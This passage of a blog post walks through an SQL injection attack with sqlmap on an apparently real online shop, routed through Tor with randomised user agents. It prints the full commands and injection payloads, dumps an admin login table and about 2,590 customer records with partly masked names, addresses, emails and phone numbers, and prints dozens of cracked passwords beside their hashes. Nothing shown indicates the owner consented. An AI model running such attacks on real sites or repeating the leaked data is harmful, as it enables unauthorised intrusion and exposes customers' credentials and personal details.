[25:51:25] [INFO] fetching database names
[25:51:25] [INFO] the SQL query used returns 2 entries
[25:51:25] [INFO] starting 2 threads
[25:51:25] [INFO] resumed: information_schema
[25:51:25] [INFO] resumed: vulnerable_database
available databases [2]:
[*] vulnerable_database
[*] information_schema

[25:51:25] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 25:51:25
Now let me keep on with the injection, we pick the  vulnerable_database(–D)  to ask for tables(–tables):
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database --tables

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 25:53:04

[25:53:04] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[25:53:04] [INFO] setting Tor SOCKS proxy settings
[25:53:04] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3
[25:53:04] [INFO] checking Tor connection
[25:53:06] [INFO] Tor is properly being used
[25:53:06] [INFO] resuming back-end DBMS 'mysql' 
[25:53:06] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[25:53:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
[25:53:08] [INFO] fetching tables for database: 'vulnerable_database'
[25:53:08] [INFO] the SQL query used returns 12 entries
[25:53:08] [INFO] starting 5 threads
[25:53:08] [INFO] resumed: categories
[25:53:08] [INFO] resumed: AdminLogin
[25:53:08] [INFO] resumed: oneTable_hiding_real
[25:53:08] [INFO] resumed: C0mpr4d0r3s
[25:53:08] [INFO] resumed: Marcas
[25:53:08] [INFO] resumed: Comprados_Prod
[25:53:08] [INFO] resumed: Pedidos
[25:53:08] [INFO] resumed: Estilo
[25:53:08] [INFO] resumed: articless
[25:53:08] [INFO] resumed: ciudades
[25:53:08] [INFO] resumed: Subcategories
[25:53:08] [INFO] resumed: paises
Database: vulnerable_database
[12 tables]
+---------------------+
| AdminLogin          |
| oneTable_hiding_real|
| categories          |
| C0mpr4d0r3s         |
| Estilo              |
| Marcas              |
| Pedidos             |
| Comprados_Prod      |
| articless           |
| Subcategories       |
| ciudades            |
| paises              |
+---------------------+

[25:53:08] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 25:53:08
We have obtained 12 tables, and quickly we note an interesting table: AdminLogin( –T AdminLogin –dump). So let’s dump that table:
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database -T  AdminLogin  --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 25:56:55

[25:56:55] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[25:56:55] [INFO] setting Tor SOCKS proxy settings
[25:56:55] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10
[25:56:55] [INFO] checking Tor connection
[25:56:57] [INFO] Tor is properly being used
[25:56:57] [INFO] resuming back-end DBMS 'mysql' 
[25:56:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[25:56:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
[25:56:59] [INFO] fetching columns for table 'AdminLogin' in database 'vulnerable_database'
[25:56:59] [INFO] the SQL query used returns 4 entries
[25:56:59] [INFO] starting 4 threads
[25:56:59] [INFO] resumed: Adm_Id
[25:56:59] [INFO] resumed: int(10)
[25:56:59] [INFO] resumed: Adm_Usuario
[25:56:59] [INFO] resumed: varchar(255)
[25:56:59] [INFO] resumed: Adm_Clave
[25:56:59] [INFO] resumed: varchar(255)
[25:56:59] [INFO] resumed: Adm_Correo
[25:56:59] [INFO] resumed: varchar(255)
[25:56:59] [INFO] fetching entries for table 'AdminLogin' in database 'vulnerable_database'
[25:56:59] [INFO] the SQL query used returns 1 entries
[25:56:59] [INFO] resumed: HXXXXXXX\xd1XXXXXXXXmjhdJKJDJ
[25:56:59] [INFO] resumed: tiXXXXXXXXXal@vulnerablesite_.com
[25:56:59] [INFO] resumed: 1
[25:56:59] [INFO] resumed: CHANGED987LFT126XertyJKA126
[25:56:59] [INFO] analyzing table dump for possible password hashes
Database: vulnerable_database
Table: AdminLogin
[1 entry]
+--------+--------------------------------------+-----------------------------------+-----------------------------+
| Adm_Id | Adm_Clave                            | Adm_Correo                        | Adm_Usuario                 |
+--------+--------------------------------------+-----------------------------------+-----------------------------+
| 1      | HGXXXX74\xdXXXXXXXXXX738993mjhdJKJDJ | tiXXXXXXXXual@vulnerablesite_.com | CHANGED987LFT126XerXXXXX126 |
+--------+--------------------------------------+-----------------------------------+-----------------------------+

[25:56:59] [INFO] table 'vulnerable_database.AdminLogin' dumped to CSV file '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com/dump/vulnerable_database/AdminLogin.csv'
[25:56:59] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 25:56:59
To tell the truth, it has been easier than use manual SQLinjection , in this case we already have credentials for logging in as Admin, but it will be next entry in the blog. As well we have seen another interesting table like C0mpr4d0r3s, which will have users,passwords and something else. Hence let’s go to view what columns it has : (–D vulnerable_database –T C0mpr4d0r3s –columns)
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database -T  C0mpr4d0r3s --columns 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[*] starting at 26:04:33

[26:04:33] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[26:04:33] [INFO] setting Tor SOCKS proxy settings
[26:04:33] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
[26:04:33] [INFO] checking Tor connection
[26:04:41] [INFO] Tor is properly being used
[26:04:41] [INFO] resuming back-end DBMS 'mysql' 
[26:04:41] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[26:04:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
[26:04:46] [INFO] fetching columns for table 'C0mpr4d0r3s' in database 'vulnerable_database'
[26:04:46] [INFO] the SQL query used returns 17 entries
[26:04:46] [INFO] starting 5 threads
[26:04:46] [INFO] resumed: Com_Id
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: nOMBRE_DKS
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: com_surnamee
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: Com_Direccion
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: Com_company
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: Com_Documento
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: fax_com
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: Com_Pais
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: Com_Ciudad
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: Com_Email
[26:04:46] [INFO] resumed: varchar(150)
[26:04:46] [INFO] resumed: Com_Telefono
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: Com_Fecha
[26:04:46] [INFO] resumed: date
[26:04:46] [INFO] resumed: Com_Clave
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: xyt_ClaveEncriptada
[26:04:46] [INFO] resumed: varchar(255)
[26:04:46] [INFO] resumed: updatenumberattemptt
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: thisIsafieldsogreaattt
[26:04:46] [INFO] resumed: date
[26:04:46] [INFO] resumed: Com_Portal
[26:04:46] [INFO] resumed: varchar(150)
Database: vulnerable_database
Table: C0mpr4d0r3s
[17 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| com_surnamee           | varchar(250) |
| Com_Ciudad             | int(10)      |
| Com_Clave              | varchar(50)  |
| xyt_ClaveEncriptada    | varchar(255) |
| Com_Direccion          | varchar(250) |
| Com_Documento          | varchar(50)  |
| Com_Email              | varchar(150) |
| Com_company            | varchar(250) |
| fax_com                | varchar(50)  |
| Com_Fecha              | date         |
| thisIsafieldsogreaattt | date         |
| Com_Id                 | int(10)      |
| nOMBRE_DKS             | varchar(250) |
| updatenumberattemptt   | int(10)      |
| Com_Pais               | int(10)      |
| Com_Portal             | varchar(150) |
| Com_Telefono           | varchar(50)  |
+------------------------+--------------+

[26:04:46] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 26:04:46
After looking at columns, let’s dump all the data of the C0mpr4d0r3s’ table, remember if you are lazy you always can use the flag: –dump-all –batch
Those flags will dump all (–dump-all) without asking anything to you(–batch)
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database -T  C0mpr4d0r3s --columns --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[*] starting at 26:06:56

[26:06:56] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[26:06:56] [INFO] setting Tor SOCKS proxy settings
[26:06:56] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Opera/9.63 (X11; Linux i686; U; en)
[26:06:56] [INFO] checking Tor connection
[26:06:58] [INFO] Tor is properly being used
[26:06:58] [INFO] resuming back-end DBMS 'mysql' 
[26:06:58] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[26:07:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
........................................INFORMATION AGAIN.........................................................
[26:07:03] [INFO] fetching entries for table 'C0mpr4d0r3s' in database 'vulnerable_database'
[26:07:03] [INFO] the SQL query used returns 2590 entries
[26:07:03] [INFO] starting 5 threads
[26:04:59] [INFO] the SQL query used returns 2590 entries
[26:05:30] [INFO] starting 5 threads
[26:05:30] [INFO] retrieved: BXXXXXXXXXXXXX
[26:05:32] [INFO] retrieved: canodasdsad
[26:05:30] [INFO] retrieved: sanchez adasdasdgas
[26:05:33] [INFO] retrieved: RXXXXX
[26:05:35] [INFO] retrieved: R. Mejias martinez
[26:05:36] [INFO] retrieved: 81
[26:05:37] [INFO] retrieved: 81
[26:05:38] [INFO] retrieved: 81
[26:05:38] [INFO] retrieved: ro???titics
[26:05:39] [INFO] retrieved: 1155
[26:05:39] [INFO] retrieved: 81
[26:05:40] [INFO] retrieved: 34bdbb5XXXXXd5a7eef3464fe5fb5da7
[26:05:40] [INFO] retrieved: jose
[26:05:40] [INFO] retrieved: 085f89XXXXXXX0651801455c86d78f0a
[26:05:41] [INFO] retrieved: agaXXXo
[26:05:41] [INFO] retrieved: 81
[26:05:41] [INFO] retrieved: c?????????????
[26:05:40] [INFO] retrieved: Carre????? 43 #59-96
[26:05:40] [INFO] retrieved: 074887f9bXXXXc05a64b5d3758df0163
[26:05:43] [INFO] retrieved: 90081951716
[26:05:43] [INFO] retrieved: 103456
[26:05:44] [INFO] retrieved: 11030404
[26:05:45] [INFO] retrieved: cr 109c 140a-33
[26:05:45] [INFO] retrieved: 660eaa47199461d01a603884080934ab
[26:05:46] [INFO] retrieved: roc????????@hotmail.com
[26:05:46] [INFO] retrieved: e10adcXXXXba59abbe56e057f16f883e
[26:05:47] [INFO] retrieved: rroro@sXXXXXX.com
[26:05:47] [INFO] retrieved: 80188104
[26:05:48] [INFO] retrieved: Calle 70D No. 105H-16
[26:05:48] [INFO] retrieved: fenix
[26:05:48] [INFO] retrieved: Calle XXXXXXXXpt 400 c
[26:05:48] [INFO] retrieved: Sp???????
[26:05:49] [INFO] retrieved: yey????m00@hotmail.com
[26:05:49] [INFO] retrieved: XXX1604066
[26:05:49] [INFO] retrieved: 
[26:05:51] [INFO] retrieved: (X71) (315) 1534
[26:05:51] [INFO] retrieved: XX9044803
[26:06:01] [INFO] retrieved: 
[26:07:09] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'xyt_ClaveEncriptada'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[26:07:41] [INFO] resuming password 'motorola' for hash '750379b5926e9f728aa6c253d37e3792'
[26:07:41] [INFO] resuming password '1703' for hash '375c71349b295fbe2dcdca9206f20a06'
[26:07:41] [INFO] resuming password '9010' for hash 'dff1749a367a95e75a84a6385df5dfa9'
[26:07:41] [INFO] resuming password '4444' for hash 'dbc4d84bfcfe2284ba11beffb853a8c4'
[26:07:41] [INFO] resuming password 'dcshoeco' for hash '6405c07b51c373a7571bac8dea68cde4'
[26:07:41] [INFO] resuming password '122189' for hash 'e117ebd823441263eaa625459a3ad608'
[26:07:41] [INFO] resuming password '100808' for hash '18f34f6f5aac8a04d7a76a5779b17b22'
[26:07:41] [INFO] resuming password 'alika123' for hash 'fe08224ec9f9e2769de06e454c8e8d29'
[26:07:41] [INFO] resuming password 'sebas' for hash '0d40d9aea2b3b5a149dc34495fff0a0a'
[26:07:41] [INFO] resuming password 'lina' for hash 'f6f4deb7dad1c2e5e0b4d6569dc3c1c5'
[26:07:41] [INFO] resuming password 'mariap' for hash '2e50277cf2528031bf3a86777e0997a7'
[26:07:41] [INFO] resuming password '9090' for hash '38f629170ac3ab74b9d6d2cc411c2f3c'
[26:07:41] [INFO] resuming password 'simon' for hash 'b30bd351371c686298d32281b337e8e9'
[26:07:41] [INFO] resuming password 'agosto3' for hash '2180363d65957169c36cc249c3d7c600'
[26:07:41] [INFO] resuming password 'cocacola' for hash '6253e1406b64bbe6ba7b00ac0bf81257'
..............................................................................................
..............................................................................................
[26:07:41] [INFO] resuming password 'filemon' for hash 'cb1b1fdd71a322bb88440c897d822148'
[26:07:41] [INFO] resuming password 'brenda13' for hash 'b8e9fa89718430237d1c61308259a057'
[26:07:41] [INFO] resuming password '260823' for hash '979b2479db180ad1ef23d364c0121b1b'
[26:07:41] [INFO] resuming password '321456' for hash 'a9a708eebbfd48267afb1f146caf5229'
[26:07:41] [INFO] resuming password 'maribel' for hash '1ed850247ae4c79e4f3abf82e174bafa'
[26:07:41] [INFO] resuming password '2354' for hash 'd254c8a084d4545bd80577481aa03076'
[26:07:41] [INFO] resuming password '9801' for hash 'b7b58836dc941cc4ba33d16dab6e3059'
[26:07:41] [INFO] resuming password '1819' for hash '17c3433fecc21b57000debdf7ad5c930'
[26:07:41] [INFO] resuming password '8910' for hash '86a1fa88adb5c33bd7a68ac2f9f3f96b'
[26:07:41] [INFO] resuming password 'milena' for hash '1b52a583020088fad8cc06fd0e67910e'
[26:07:41] [INFO] resuming password 'orgasmo' for hash 'a6ffb14bcfa5eec4b3ce3da0757f2e31'
[26:07:41] [INFO] resuming password 'tiger341' for hash '7892314e47cbbbd3ca1b282d21dae3d9'
[26:07:41] [INFO] resuming password '120384' for hash 'c6b573b737d59db113cd9dbe3a7952ba'
[26:07:41] [INFO] resuming password '1121' for hash '3a15c7d0bbe60300a39f76f8a5ba6896'
what dictionary do you want to use?
[1] default dictionary file '/bugtraq/tools/web_audit/databases/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
..............................................................................................
..............................................................................................
..............................................................................................
..............................................................................................
[26:18:24] [INFO] table 'vulnerable_database.C0mpr4d0r3s' dumped to CSV file '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com/dump/vulnerable_database/C0mpr4d0r3s.csv'
[26:18:24] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 26:18:24
Sqlmap has a internal cracker by dictionary, it is not very quick but you can use it, very soon we will crack the hashes of any database using oclHashcat-plus.
Besides this , we will see different entries about SQL injections.
That’s all folks!
Related Posts Plugin for WordPress, Blogger...
Categories: Pentest, SQLinjection Tags: